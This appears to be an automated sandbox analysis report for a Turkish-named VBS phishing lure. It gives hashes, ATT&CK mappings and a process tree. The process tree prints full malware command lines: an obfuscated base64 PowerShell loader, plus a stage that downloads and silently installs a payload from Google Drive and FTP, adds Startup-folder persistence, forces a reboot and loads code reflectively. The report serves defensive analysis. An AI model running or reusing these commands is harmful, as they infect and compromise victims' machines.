63c0755410ad88fd4567e6065fe9b0ab50ccc6a523bed1badd00af9e9b584180

General

Target

Ödeme Onayı.vbs
Size

585KB
MD5

e8b451ec06c7782196418eb73e4b0731
SHA1

0b0b23f532f7e6241fabe6eb5cb1e8490b3dd1f4
SHA256

3e0f0059d28f652c2575514c53d31dbfa1c96bd13d1f3457a22fd0dca5336011
SHA512

a3b40c48836fe2dcb84c3803a1a815039a93b4463e0acbe90372610b64663d40c6642461cfa8931bcb199cb43f842f9552e08b95d7108578847b14cbb7742918
SSDEEP

1536:l/Q/Q/Q/Q/Q/Q/Q/Q/Q/Q/Q/Q/Q/Q/Q/Q/Q/F/i/i/i/i/i/i/i/i/i/i/i/i/iW:j3Jg6azbLal3Jg6azbLal3Jg6azbLaO

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://drive.google.com/uc?export=download&id=

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2300	powershell.exe
2796	powershell.exe
2904	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
5	drive.google.com
4	drive.google.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Ödeme Onayı.vbs"
1⤵
PID:1952
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $qKKzc = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAEQARAAgAEQAJwAgACwAIA' + [char]66 + 'vAFQAUg' + [char]66 + 'oAFgAJAAgACwAIAAnAGgAdA' + [char]66 + '0AHAAcwA6AC8ALw' + [char]66 + 'uAGUAdQ' + [char]66 + '0AHIAYQ' + [char]66 + 'sAGQAZQ' + [char]66 + 'zAGkAZw' + [char]66 + 'uAC4AYw' + [char]66 + 'vAC8AegAuAHQAeA' + [char]66 + '0ACcAIAAoACAAXQ' + [char]66 + 'dAFsAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAG8AWwAgACwAIA' + [char]66 + 'sAGwAdQ' + [char]66 + 'uACQAIAAoAGUAaw' + [char]66 + 'vAHYAbg' + [char]66 + 'JAC4AKQAgAG0ARw' + [char]66 + 'xAGkAbgAkACAAKA' + [char]66 + 'kAG8AaA' + [char]66 + '0AGUATQ' + [char]66 + '0AGUARwAuACkAIA' + [char]66 + 'FAGYAWA' + [char]66 + 'zAGcAJAAgACsAIA' + [char]66 + 'HAGkAVA' + [char]66 + '6AEoAJAAgACgAZQ' + [char]66 + 'wAHkAVA' + [char]66 + '0AGUARwAuACkAIA' + [char]66 + '6AGQAZg' + [char]66 + '5AEYAJAAgACgAZA' + [char]66 + 'hAG8ATAAuAG4AaQ' + [char]66 + 'hAG0Abw' + [char]66 + 'EAHQAbg' + [char]66 + 'lAHIAcg' + [char]66 + '1AEMAOgA6AF0Abg' + [char]66 + 'pAGEAbQ' + [char]66 + 'vAEQAcA' + [char]66 + 'wAEEALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bADsAJw' + [char]66 + 'JAFYARg' + [char]66 + 'yAHAAJwAgAD0AIA' + [char]66 + 'tAEcAcQ' + [char]66 + 'pAG4AJAA7ACcAMQ' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMAJwAgAD0AIA' + [char]66 + 'FAGYAWA' + [char]66 + 'zAGcAJAA7ACcALgAzAHkAcg' + [char]66 + 'hAHIAYg' + [char]66 + 'pAEwAcw' + [char]66 + 'zAGEAbA' + [char]66 + 'DACcAIAA9ACAARw' + [char]66 + 'pAFQAeg' + [char]66 + 'KACQAOwAnACUASQ' + [char]66 + 'oAHEAUg' + [char]66 + 'YACUAJwAgAD0AIA' + [char]66 + 'vAFQAUg' + [char]66 + 'oAFgAJAA7ACkAIAApACcAQQAnACwAJwCTIToAkyEnACgAZQ' + [char]66 + 'jAGEAbA' + [char]66 + 'wAGUAcgAuAGgAaA' + [char]66 + 'sAHgAdwAkACAAKA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUwA0ADYAZQ' + [char]66 + 'zAGEAQg' + [char]66 + 'tAG8Acg' + [char]66 + 'GADoAOg' + [char]66 + 'dAHQAcg' + [char]66 + 'lAHYAbg' + [char]66 + 'vAEMALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAcw' + [char]66 + 'bACAAPQAgAHoAZA' + [char]66 + 'mAHkARgAkACAAXQ' + [char]66 + 'dAFsAZQ' + [char]66 + '0AHkAQg' + [char]66 + 'bADsAIAApADgARg' + [char]66 + 'UAFUAIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALQAgAHEAeA' + [char]66 + 'UAGIAbwAkACAAaA' + [char]66 + '0AGEAUAAtACAAdA' + [char]66 + 'uAGUAdA' + [char]66 + 'uAG8AQwAtAHQAZQ' + [char]66 + 'HACgAIAA9ACAAaA' + [char]66 + 'oAGwAeA' + [char]66 + '3ACQAOwAgACAAfQAgAGcAbg' + [char]66 + 'pAHMAcg' + [char]66 + 'hAFAAYw' + [char]66 + 'pAHMAYQ' + [char]66 + 'CAGUAcw' + [char]66 + 'VAC0AIA' + [char]66 + 'xAHgAVA' + [char]66 + 'iAG8AJAAgAGUAbA' + [char]66 + 'pAEYAdA' + [char]66 + '1AE8ALQAgAHAAYg' + [char]66 + 'yAHYAcwAkACAASQ' + [char]66 + 'SAFUALQAgAHQAcw' + [char]66 + 'lAHUAcQ' + [char]66 + 'lAFIAYg' + [char]66 + 'lAFcALQ' + [char]66 + 'lAGsAbw' + [char]66 + '2AG4ASQA7ACAAKQAgAHEAeA' + [char]66 + 'UAGIAbwAkACAAaA' + [char]66 + '0AGEAUAAtACAAdA' + [char]66 + 'uAGUAdA' + [char]66 + 'uAG8AQwAtAHQAZQ' + [char]66 + 'HACAAKAAgAD0AIA' + [char]66 + 'wAGIAcg' + [char]66 + '2AHMAJAA7ACAAKQAnAHQAeA' + [char]66 + '0AC4AMQAwAGwAbA' + [char]66 + 'kACcAIAArACAAKQAoAGgAdA' + [char]66 + 'hAFAAcA' + [char]66 + 'tAGUAVA' + [char]66 + '0AGUARwA6ADoAXQ' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC4ATw' + [char]66 + 'JAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAoACAAPQAgAHEAeA' + [char]66 + 'UAGIAbwAkAHsAIA' + [char]66 + 'kAG4AYQ' + [char]66 + 'tAG0Abw' + [char]66 + 'jAC0AIA' + [char]66 + 'lAHgAZQAuAGwAbA' + [char]66 + 'lAGgAcw' + [char]66 + 'yAGUAdw' + [char]66 + 'vAHAAOwAgADEALgAwAC4AMAAuADcAMgAxACAAZw' + [char]66 + 'uAGkAcAA7ACAAYwAvACAAZQ' + [char]66 + '4AGUALg' + [char]66 + 'kAG0AYwA7AGwAYQ' + [char]66 + 'pAHQAbg' + [char]66 + 'lAGQAZQ' + [char]66 + 'yAGMAJAAgAGwAYQ' + [char]66 + 'pAHQAbg' + [char]66 + 'lAGQAZQ' + [char]66 + 'yAEMALQAgAGcAbg' + [char]66 + 'pAHMAcg' + [char]66 + 'hAFAAYw' + [char]66 + 'pAHMAYQ' + [char]66 + 'CAGUAcw' + [char]66 + 'VAC0AIA' + [char]66 + 'xAHgAVA' + [char]66 + 'iAG8AJAAgAGUAbA' + [char]66 + 'pAEYAdA' + [char]66 + '1AE8ALQAgAHcAeQ' + [char]66 + 'rAG4AagAkACAASQ' + [char]66 + 'SAFUALQAgAHQAcw' + [char]66 + 'lAHUAcQ' + [char]66 + 'lAFIAYg' + [char]66 + 'lAFcALQ' + [char]66 + 'lAGsAbw' + [char]66 + '2AG4ASQA7ACkAKQApACkAKQAgADQANgAsADQANgAsADYANQAsADUANQAsADMANQAsADkANAAsADkAOAAsADcANwAsADYANgAsADUAOAAsACAANwA5ACwAIAAxADIAMQAsACAAMQA3ACAALAA5ADEAMQAgACwAMAA3ACAALAA2ADYAKA' + [char]66 + 'dAF0AWw' + [char]66 + 'yAGEAaA' + [char]66 + 'jAFsAIA' + [char]66 + 'uAGkAbw' + [char]66 + 'qAC0AKAAgAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAC0AIA' + [char]66 + 'lAGMAcg' + [char]66 + 'vAEYALQAgAHQAeA' + [char]66 + 'lAFQAbg' + [char]66 + 'pAGEAbA' + [char]66 + 'QAHMAQQAtACAAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMAZQ' + [char]66 + 'yAHUAYw' + [char]66 + 'lAFMALQ' + [char]66 + 'vAFQAdA' + [char]66 + 'yAGUAdg' + [char]66 + 'uAG8AQwAoACAALAApACkAOQA0ACwANgAxADEALAA3ADkALAA0ADEAMQAsADgAOQAsADgAMQAxACwANwAwADEALAA5ADkALAA1ADEAMQAsADEAMAAxACwAMAAwADEAKA' + [char]66 + 'dAF0AWw' + [char]66 + 'yAGEAaA' + [char]66 + 'jAFsAIA' + [char]66 + 'uAGkAbw' + [char]66 + 'qAC0AKAAoAGwAYQ' + [char]66 + 'pAHQAbg' + [char]66 + 'lAGQAZQ' + [char]66 + 'yAEMAUw' + [char]66 + 'QACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAoACAAPQAgAGwAYQ' + [char]66 + 'pAHQAbg' + [char]66 + 'lAGQAZQ' + [char]66 + 'yAGMAJAA7ACkAJw' + [char]66 + '0AHgAdAAuADEAMA' + [char]66 + 'sAGwAZAAnACAAKwAgACkAKA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAHAAbQ' + [char]66 + 'lAFQAdA' + [char]66 + 'lAEcAOgA6AF0AaA' + [char]66 + '0AGEAUAAuAE8ASQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAAoACAAPQAgAHEAeA' + [char]66 + 'UAGIAbwAkADsAKQAgACcAdA' + [char]66 + '4AHQALgAxADAATA' + [char]66 + 'MAEQALwAxADAALwAnACAAKwAgACcAcg' + [char]66 + 'lAHQAcA' + [char]66 + '5AHIAYw' + [char]66 + 'wAFUALw' + [char]66 + 'yAGIALg' + [char]66 + 'tAG8AYwAuAHQAYQ' + [char]66 + 'yAGIAdg' + [char]66 + 'rAGMAcw' + [char]66 + 'lAGQALg' + [char]66 + 'wAHQAZg' + [char]66 + 'AADEAdA' + [char]66 + 'hAHIAYg' + [char]66 + '2AGsAYw' + [char]66 + 'zAGUAZAAvAC8AOg' + [char]66 + 'wAHQAZgAnACgAIAA9ACAAdw' + [char]66 + '5AGsAbg' + [char]66 + 'qACQAOwAgADIAMQ' + [char]66 + 'zAGwAVAA6ADoAXQ' + [char]66 + 'lAHAAeQ' + [char]66 + 'UAGwAbw' + [char]66 + 'jAG8AdA' + [char]66 + 'vAHIAUA' + [char]66 + '5AHQAaQ' + [char]66 + 'yAHUAYw' + [char]66 + 'lAFMALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAbA' + [char]66 + 'vAGMAbw' + [char]66 + '0AG8Acg' + [char]66 + 'QAHkAdA' + [char]66 + 'pAHIAdQ' + [char]66 + 'jAGUAUwA6ADoAXQ' + [char]66 + 'yAGUAZw' + [char]66 + 'hAG4AYQ' + [char]66 + 'NAHQAbg' + [char]66 + 'pAG8AUA' + [char]66 + 'lAGMAaQ' + [char]66 + '2AHIAZQ' + [char]66 + 'TAC4AdA' + [char]66 + 'lAE4ALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bADsAIA' + [char]66 + '9AGUAdQ' + [char]66 + 'yAHQAJA' + [char]66 + '7ACAAPQAgAGsAYw' + [char]66 + 'hAGIAbA' + [char]66 + 'sAGEAQw' + [char]66 + 'uAG8AaQ' + [char]66 + '0AGEAZA' + [char]66 + 'pAGwAYQ' + [char]66 + 'WAGUAdA' + [char]66 + 'hAGMAaQ' + [char]66 + 'mAGkAdA' + [char]66 + 'yAGUAQw' + [char]66 + 'yAGUAdg' + [char]66 + 'yAGUAUwA6ADoAXQ' + [char]66 + 'yAGUAZw' + [char]66 + 'hAG4AYQ' + [char]66 + 'NAHQAbg' + [char]66 + 'pAG8AUA' + [char]66 + 'lAGMAaQ' + [char]66 + '2AHIAZQ' + [char]66 + 'TAC4AdA' + [char]66 + 'lAE4ALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bAHsAIA' + [char]66 + 'lAHMAbA' + [char]66 + 'lAH0AIA' + [char]66 + 'mAC8AIAAwACAAdAAvACAAcgAvACAAZQ' + [char]66 + '4AGUALg' + [char]66 + 'uAHcAbw' + [char]66 + 'kAHQAdQ' + [char]66 + 'oAHMAIAA7ACcAMAA4ADEAIA' + [char]66 + 'wAGUAZQ' + [char]66 + 'sAHMAJwAgAGQAbg' + [char]66 + 'hAG0AbQ' + [char]66 + 'vAGMALQAgAGUAeA' + [char]66 + 'lAC4AbA' + [char]66 + 'sAGUAaA' + [char]66 + 'zAHIAZQ' + [char]66 + '3AG8AcAA7ACAAZQ' + [char]66 + 'jAHIAbw' + [char]66 + 'mAC0AIAApACAAJw' + [char]66 + 'wAHUAdA' + [char]66 + 'yAGEAdA' + [char]66 + 'TAFwAcw' + [char]66 + 'tAGEAcg' + [char]66 + 'nAG8Acg' + [char]66 + 'QAFwAdQ' + [char]66 + 'uAGUATQAgAHQAcg' + [char]66 + 'hAHQAUw' + [char]66 + 'cAHMAdw' + [char]66 + 'vAGQAbg' + [char]66 + 'pAFcAXA' + [char]66 + '0AGYAbw' + [char]66 + 'zAG8Acg' + [char]66 + 'jAGkATQ' + [char]66 + 'cAGcAbg' + [char]66 + 'pAG0AYQ' + [char]66 + 'vAFIAXA' + [char]66 + 'hAHQAYQ' + [char]66 + 'EAHAAcA' + [char]66 + '' + [char]66 + 'AFwAJwAgACsAIA' + [char]66 + 'mAEQAWQ' + [char]66 + 'jAG0AJAAgACgAIA' + [char]66 + 'uAG8AaQ' + [char]66 + '0AGEAbg' + [char]66 + 'pAHQAcw' + [char]66 + 'lAEQALQAgACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACAAbQ' + [char]66 + 'lAHQASQAtAHkAcA' + [char]66 + 'vAEMAIAA7ACAAdA' + [char]66 + 'yAGEAdA' + [char]66 + 'zAGUAcg' + [char]66 + 'vAG4ALwAgAHQAZQ' + [char]66 + 'pAHUAcQAvACAAQg' + [char]66 + 'sAHAAaw' + [char]66 + '0ACAAZQ' + [char]66 + '4AGUALg' + [char]66 + 'hAHMAdQ' + [char]66 + '3ACAAZQ' + [char]66 + '4AGUALg' + [char]66 + 'sAGwAZQ' + [char]66 + 'oAHMAcg' + [char]66 + 'lAHcAbw' + [char]66 + 'wACAAOwApACcAdQ' + [char]66 + 'zAG0ALg' + [char]66 + 'uAGkAdw' + [char]66 + 'wAFUAXAAnACAAKwAgAHUAbw' + [char]66 + 'XAFoAVAAkACgAIAA9ACAAQg' + [char]66 + 'sAHAAaw' + [char]66 + '0ADsAKQAgAGUAbQ' + [char]66 + 'hAE4Acg' + [char]66 + 'lAHMAVQA6ADoAXQ' + [char]66 + '0AG4AZQ' + [char]66 + 'tAG4Abw' + [char]66 + 'yAGkAdg' + [char]66 + 'uAEUAWwAgACsAIAAnAFwAcw' + [char]66 + 'yAGUAcw' + [char]66 + 'VAFwAOg' + [char]66 + 'DACcAKAAgAD0AIA' + [char]66 + 'mAEQAWQ' + [char]66 + 'jAG0AJAA7ACkAIAApACcAdQ' + [char]66 + 'zAG0ALg' + [char]66 + 'uAGkAdw' + [char]66 + 'wAFUAXAAnACAAKwAgAHUAbw' + [char]66 + 'XAFoAVAAkACgAIAAsAGwAbg' + [char]66 + 'qAHQAdwAkACgAZQ' + [char]66 + 'sAGkARg' + [char]66 + 'kAGEAbw' + [char]66 + 'sAG4Adw' + [char]66 + 'vAEQALg' + [char]66 + '2AGoAdw' + [char]66 + '3AGMAJAA7ADgARg' + [char]66 + 'UAFUAOgA6AF0AZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC4AdA' + [char]66 + '4AGUAVAAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC4Adg' + [char]66 + 'qAHcAdw' + [char]66 + 'jACQAOwApAHQAbg' + [char]66 + 'lAGkAbA' + [char]66 + 'DAGIAZQ' + [char]66 + 'XAC4AdA' + [char]66 + 'lAE4AIA' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIATwAtAHcAZQ' + [char]66 + 'OACgAIAA9ACAAdg' + [char]66 + 'qAHcAdw' + [char]66 + 'jACQAOw' + [char]66 + '9ADsAIAApACcAdA' + [char]66 + 'PAEwAYw' + [char]66 + 'fAEsAYQAzAFoAZg' + [char]66 + 'vAFgAMg' + [char]66 + 'KAEoAcg' + [char]66 + 'WAGgAbQ' + [char]66 + 'WADkAYw' + [char]66 + 'tADkAWA' + [char]66 + 'zAHUAWA' + [char]66 + 'tAGoAMQ' + [char]66 + 'nADEAJwAgACsAIA' + [char]66 + 'sAG4Aag' + [char]66 + '0AHcAJAAoACAAPQAgAGwAbg' + [char]66 + 'qAHQAdwAkAHsAIA' + [char]66 + 'lAHMAbA' + [char]66 + 'lAH0AOwAgACkAJwAyADQAdQ' + [char]66 + 'YAEoAVA' + [char]66 + 'xAGEAbQ' + [char]66 + 'nAHkATQ' + [char]66 + '0AEYAeg' + [char]66 + 'hAGsAUA' + [char]66 + 'SADEAcQ' + [char]66 + 'fAEkAdg' + [char]66 + 'HAGkAWA' + [char]66 + 'OAGQAcQ' + [char]66 + 'hAE4AMQAnACAAKwAgAGwAbg' + [char]66 + 'qAHQAdwAkACgAIAA9ACAAbA' + [char]66 + 'uAGoAdA' + [char]66 + '3ACQAewAgACkAIA' + [char]66 + 'EAFcAZw' + [char]66 + 'WAHEAJAAgACgAIA' + [char]66 + 'mAGkAOwAgACkAJwA0ADYAJwAoAHMAbg' + [char]66 + 'pAGEAdA' + [char]66 + 'uAG8AQwAuAEUAUg' + [char]66 + 'VAFQAQw' + [char]66 + 'FAFQASQ' + [char]66 + 'IAEMAUg' + [char]66 + '' + [char]66 + 'AF8AUg' + [char]66 + 'PAFMAUw' + [char]66 + 'FAEMATw' + [char]66 + 'SAFAAOg' + [char]66 + '2AG4AZQAkACAAPQAgAEQAVw' + [char]66 + 'nAFYAcQAkADsAJwA9AGQAaQAmAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8AZAA9AHQAcg' + [char]66 + 'vAHAAeA' + [char]66 + 'lAD8AYw' + [char]66 + '1AC8AbQ' + [char]66 + 'vAGMALg' + [char]66 + 'lAGwAZw' + [char]66 + 'vAG8AZwAuAGUAdg' + [char]66 + 'pAHIAZAAvAC8AOg' + [char]66 + 'zAHAAdA' + [char]66 + '0AGgAJwAgAD0AIA' + [char]66 + 'sAG4Aag' + [char]66 + '0AHcAJAA7ACkAIAAnAHUAcw' + [char]66 + 'tAC4Abg' + [char]66 + 'pAHcAcA' + [char]66 + 'VAFwAJwAgACsAIA' + [char]66 + '1AG8AVw' + [char]66 + 'aAFQAJAAgACgAIA' + [char]66 + 'sAGUAZAA7ACkAKA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAHAAbQ' + [char]66 + 'lAFQAdA' + [char]66 + 'lAEcAOgA6AF0AaA' + [char]66 + '0AGEAUAAuAE8ASQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAdQ' + [char]66 + 'vAFcAWg' + [char]66 + 'UACQAewAgACkAIA' + [char]66 + 'WAGYAcg' + [char]66 + 'EAFEAJAAgACgAIA' + [char]66 + 'mAGkAOwAgACkAMgAoAHMAbA' + [char]66 + 'hAHUAcQ' + [char]66 + 'FAC4Acg' + [char]66 + 'vAGoAYQ' + [char]66 + 'NAC4Abg' + [char]66 + 'vAGkAcw' + [char]66 + 'yAGUAVgAuAHQAcw' + [char]66 + 'vAGgAJAAgAD0AIA' + [char]66 + 'WAGYAcg' + [char]66 + 'EAFEAJAAgADsA';$wfjhv = $qKKzc; ;$wfjhv = $qKKzc.replace('уЦϚ' , 'B') ;;$qjxvb = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $wfjhv ) ); $qjxvb = $qjxvb[-1..-$qjxvb.Length] -join '';$qjxvb = $qjxvb.replace('%XRqhI%','C:\Users\Admin\AppData\Local\Temp\Ödeme Onayı.vbs');powershell $qjxvb
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:2300
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$wtjnl = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$wtjnl = ($wtjnl + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$wtjnl = ($wtjnl + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$cwwjv = (New-Object Net.WebClient);$cwwjv.Encoding = [System.Text.Encoding]::UTF8;$cwwjv.DownloadFile($wtjnl, ($TZWou + '\Upwin.msu') );$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\Ödeme Onayı.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;$jnkyw = ('ftp://[email protected]/Upcrypter' + '/01/DLL01.txt' );$obTxq = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$credential = (New-Object PSCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)), (ConvertTo-SecureString -AsPlainText -Force -String (-join [char[]](66, 70, 119, 71 ,121 ,97 ,85,66,77,89,49,53,55,56,64,64 )))));Invoke-WebRequest -URI $jnkyw -OutFile $obTxq -UseBasicParsing -Credential $credential;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$obTxq = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$svrbp = ( Get-Content -Path $obTxq ) ;Invoke-WebRequest -URI $svrbp -OutFile $obTxq -UseBasicParsing } ;$wxlhh = (Get-Content -Path $obTxq -Encoding UTF8) ;[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $wxlhh.replace('↓:↓','A') );$XhRTo = 'C:\Users\Admin\AppData\Local\Temp\Ödeme Onayı.vbs';$JzTiG = 'ClassLibrary3.';$gsXfE = 'Class1';$niqGm = 'prFVI';[System.AppDomain]::CurrentDomain.Load( $Fyfdz ).GetType( $JzTiG + $gsXfE ).GetMethod( $niqGm ).Invoke( $null , [object[]] ( 'txt.z/oc.ngisedlartuen//:sptth' , $XhRTo , 'D DD' ) );};"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:2796
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wusa.exe tkplB /quiet /norestart
      4⤵
      PID:2256
    - - C:\Windows\system32\wusa.exe
        
        "C:\Windows\system32\wusa.exe" tkplB /quiet /norestart
        5⤵
        
        PID:2576
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "sleep 180"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:2904

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
902f17602c78c04f881ec19e5506387b

SHA1
12e859214780ebec154486e416c498b947afbf8f

SHA256
4174e060cbdfe209b1cda2352d03d8694b2c0e9495551d002d9d71b8fb044584

SHA512
b579d48bdb58576c4b9b53ddd9c8747b1260eec1add84ae08f9feaf2398fe403d60602fabdd204bb6bbfdeab41f85ba84bad00777416da3b90936b51bc440818

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
3876fc20a7489279a7b101c373978f0c

SHA1
64cc1202bdd25e5c61fff5a61ee3c6084d372163

SHA256
e4db0bad7a9e3044dc7f6deb206fb2b7b0611bedf43a7d5b3ae3c76c244da4ba

SHA512
36890dd8802778d04abeef6be6587f4f9dbc5907a5f0b92e3ba8a4c417af7a70945d807b55e8ca194b82fd2a0a23e94dcce11a715a09719fb2665344592ac1b8

Download Submit
memory/2300-4-0x000007FEF5B3E000-0x000007FEF5B3F000-memory.dmp

Filesize
4KB

Download
memory/2300-5-0x000000001B1A0000-0x000000001B482000-memory.dmp

Filesize
2.9MB

Download
memory/2300-7-0x000007FEF5880000-0x000007FEF621D000-memory.dmp

Filesize
9.6MB

Download
memory/2300-6-0x0000000002400000-0x0000000002408000-memory.dmp

Filesize
32KB

Download
memory/2300-8-0x000007FEF5880000-0x000007FEF621D000-memory.dmp

Filesize
9.6MB

Download
memory/2300-9-0x000007FEF5880000-0x000007FEF621D000-memory.dmp

Filesize
9.6MB

Download
memory/2300-10-0x000007FEF5880000-0x000007FEF621D000-memory.dmp

Filesize
9.6MB

Download
memory/2300-16-0x000007FEF5880000-0x000007FEF621D000-memory.dmp

Filesize
9.6MB

Download
memory/2300-17-0x000007FEF5B3E000-0x000007FEF5B3F000-memory.dmp

Filesize
4KB

Download
memory/2300-18-0x000007FEF5880000-0x000007FEF621D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing